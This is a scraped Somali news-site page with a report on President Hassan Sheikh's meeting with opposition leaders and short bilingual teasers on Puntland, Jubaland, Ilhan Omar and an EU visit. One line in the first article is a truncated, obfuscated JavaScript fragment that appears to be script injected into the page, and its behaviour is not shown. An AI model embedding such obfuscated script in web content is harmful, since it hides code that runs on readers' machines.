Villa Somalia oo war kasoo saartay Kulankii MW Xasan Sheekh iyo Mucaaradka
MUQDISHO, Soomaaliya - Kulankii Maanta ee Madaxweynaha JFS Xasan Sheekh, Guddiga Dowladda ee u xil-saaran wadahadallada iyo xubnaha Madasha Samatabixinta,
Waxaa la isku raacay in laga wadahadlo afar ajende oo muhiim u ah dowlad-dhiska dalka, kuwaas oo kala ah:
1-Adekeynta midnimada dalka,
2-Hanaanka dib u eegista dastuurka,
3-Amniga iyo ciribtirka argagixisada,
4-Hanaanka doorashooyinka tooska ah oo heshiis lagu yahay.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...
Somali President Meets Opposition Leaders as Part of National Dialogue Effort
Mogadishu – Somali President Hassan Sheikh Mohamud met with a group of opposition leaders on Wednesday at the Presidential Palace in Mogadishu, as part of ongoing efforts to build consensus through the National Dialogue initiative launched earlier this month.
The meeting included prominent figures from opposition parties, former senior government officials, and influential political actors. According to a statement from...
Mucaaradka oo Villa Somalia kula kulmay Madaxweyne Xasan Sheekh
MUQDISHO - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud, ayaa maanta si rasmi ah Madaxtooyada Qaranka ugu qaabilay mas’uuliyiinta Mucaaradka oo isugu jira Madaxweyne hore, Ra’iisul Wasaareyaal hore, Guddoomiyihii hore ee Baarlamaanka Federaalka Soomaaliya iyo xubno kale oo ka tirsan hoggaanka siyaasadeed ee dalka.
Kulankan ayaa qeyb ka ah dadaallada socda ee Madaxweynaha uu ku horumarinayo Gogosha Wadatashiga Qaran oo dhawaan si...
Boosaaso governor orders businesses to fund Puntland forces fighting ISIS
BOSASO, Somalia - The governor of Boosaaso, the commercial capital of Puntland, Abdifitah Mohamed Osman, issued strict orders demanding local businesses and traders contribute financially to support Puntland security forces battling ISIS.
In a public statement, Governor Abdifitah warned that any company or business that fails to comply with the fundraising directive will face closure or removal from the city.
“Businesses...
Amar adag la dul dhigay ganacsatada Boosaaso, Puntland
BOOSAASO, Soomaaliya – Guddoomiyaha magaalada Boosaaso, Mudane Cabdifitaax Maxamed Cismaan, ayaa awaamiir culus kusoo rogay ganacsatada ku sugan Boosaaso, isagoo ku wargeliyay inay bixin doonaan dhaqaale loogu talagalay taageerada ciidamada difaaca Puntland ee dagaalka kula jira kooxda argagixisada ah ee Daacish.
Guddoomiyaha ayaa sheegay in shirkad ama xarun ganacsi oo ka gaabiso bixinta lacagtaasi aysan sii shaqeyn doonin gudaha magaalada Boosaaso,...
Trump launches verbal attack on Rep. Ilhan Omar over criticism of military deployment
WASHINGTON, United States - U.S. President Donald Trump launched a scathing verbal attack on Democratic Congresswoman Ilhan Omar after she strongly criticized the government's domestic security policies, particularly the deployment of military forces in response to protests.
Omar, a Somali-American representative from Minnesota, condemned the use of the National Guard in Los Angeles amid demonstrations against the treatment of migrants, calling...
Trump oo weerar afka ah ku qaaday Ilhaan Cumar
WASHINGTON - Madaxweynaha Mareykanka, Donald Trump, ayaa weerar afka ah ku qaaday Ilhaan Cumar, oo ka tirsan Aqalka Wakiillada Mareykanka, kadib markii ay dhaleeceyn xooggan u jeedisay siyaasadihii amniga gudaha ee xukuumaddiisa, gaar ahaan adeegsiga ciidamada militariga.
Ilhaan Cumar ayaa hadalkeeda jeedisay iyadoo ka falcelinaysay markii ciidamada Qaranka Mareykanka loo daadgureeyay magaalada Los Angeles, xilli ay ka socdeen mudaharaadyo looga...
Somali, Jubaland Forces Launch Offensive on Al-Shabaab in South
KISMAYO, Somalia - Security sources in southern Somalia say Jubaland regional forces, in coordination with the U.S.-trained Danab special forces and the 56th Battalion of the Somali National Army’s 11th Division, have carried out a planned military operation targeting Al-Shabaab strongholds in several areas of Lower Juba region.
The joint offensive reportedly took place in the areas of Malaaleey, Araare,...
Howlgallo culus oo laga fuliyey gobolka Jubbada Hoose, Jubbaland
KISMAAYO, Soomaaliya - Wararka naga soo gaaraya deegaano dhowr ah oo ka tirsan gobolka Jubbada Hoose ayaa sheegaya in ciidamada maamulka Jubbaland oo kaashanaya Kumaandooska Danab iyo Ururka 56-aad ee guutada 11-aad ee ciidanka xoogga dalka Soomaaliyeed ay howlgal qorsheysan ka fuliyeen deegaannada Malaaleey, Araare, Koban, Janaale Jay iyo Reeynero oo ku yaalla jiinka wabiga Jubba.
Sida lagu sheegay war-saxaafadeed...
Madaxweyne Xasan Sheekh oo la kulmay wafdi ka socday Midowga Yurub
MUQDISHO, Soomaaliya – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa ku qaabilay Madaxtooyada Qaranka Villa Soomaaliya wafdi sare oo ka socday Adeegga Dhaqaalaha Dibadda ee Midowga Yurub (EEAS), sida lagu sheegay war kasoo baxay madaxtooyada.
Wafdiga waxaa hoggaaminayay Agaasimaha Afrika ee EEAS, Mr. Jonas Jonsson, waxaana wehlinaysay Safiirka Midowga Yurub ee Soomaaliya, Marwo Karin Johansson. Kulanka ayaa diiradda...









